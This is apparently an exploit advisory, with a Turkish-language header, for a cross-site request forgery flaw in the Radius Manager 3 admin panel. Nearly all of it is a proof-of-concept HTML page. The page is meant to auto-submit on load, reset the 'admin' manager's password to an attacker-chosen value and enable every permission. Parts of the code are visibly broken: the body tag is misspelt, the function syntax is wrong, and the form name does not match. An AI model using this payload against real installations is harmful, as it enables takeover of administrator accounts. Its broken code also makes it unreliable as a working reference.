< ------------------- header data start ------------------- >

#############################################################

# Application Name : Radius Manager 3 # XSRF

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/DaiMon

# Script Fiyati : $99,00!
############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >



<b0dy onLoad=Submit();>
<script>function Submit[]{document.DaiMon.submit();}</script>

<form name=form1 action=admin.php?cont=update_manager&managername=admin method=post>
<td colspan=5 class=normal><strong>admin</strong></td>
<td colspan=5 class=normal><input name=enablemanager type=checkbox id=enablemanager value=1 checked>
<td colspan=5 class=normal><input name=password1 type=password class=normal id=password1 value=DaiMon maxlength=32 size=18>
<td colspan=5 class=normal><input name=password2 type=password class=normal id=password2 value=DaiMon maxlength=32 size=18>
<input name=perm_listusers type=checkbox id=perm_listusers value=1 checked></td>
<input name=perm_listmanagers type=checkbox id=perm_listmanagers value=1 checked>
<input name=perm_listservices type=checkbox id=perm_listservices value=1 checked>
<input name=perm_createusers type=checkbox id=perm_createusers value=1 checked>
<input name=perm_createmanagers type=checkbox id=perm_createmanagers value=1 checked>
<input name=perm_createservices type=checkbox id=perm_createservices value=1 checked>
<input name=perm_editusers type=checkbox id=perm_editusers value=1 checked>
<input name=perm_editmanagers type=checkbox id=perm_editmanagers value=1 checked>
<input name=perm_editservices type=checkbox id=perm_editservices value=1 checked>
<input name=perm_deleteusers type=checkbox id=perm_deleteusers value=1 checked>
<input name=perm_deletemanagers type=checkbox id=perm_deletemanagers value=1 checked>
<input name=perm_deleteservices type=checkbox id=perm_deleteservices value=1 checked>
<input name=perm_listinvoices type=checkbox id=perm_listinvoices value=1 checked>
<input name=perm_listonlineusers type=checkbox id=perm_listonlineusers value=1 checked>
<input name=perm_listallinvoices type=checkbox id=perm_listallinvoices value=1 checked>
<input name=perm_logout type=checkbox id=perm_logout value=1 checked>
<input name=perm_editinvoice type=checkbox id=perm_editinvoice value=1 checked>
<input name=perm_addcredits type=checkbox id=perm_addcredits value=1 checked>
<input name=perm_listpayouts type=checkbox id=perm_listpayouts value=1 checked>
<input name=perm_trafficreport type=checkbox id=perm_trafficreport value=1 checked>
<input name=perm_makepayouts type=checkbox id=perm_makepayouts value=1 checked>
<input name=perm_cardsys type=checkbox id=perm_cardsys value=1 checked>
<input type=submit name=Submit value=update manager>


< -- bug code end of -- >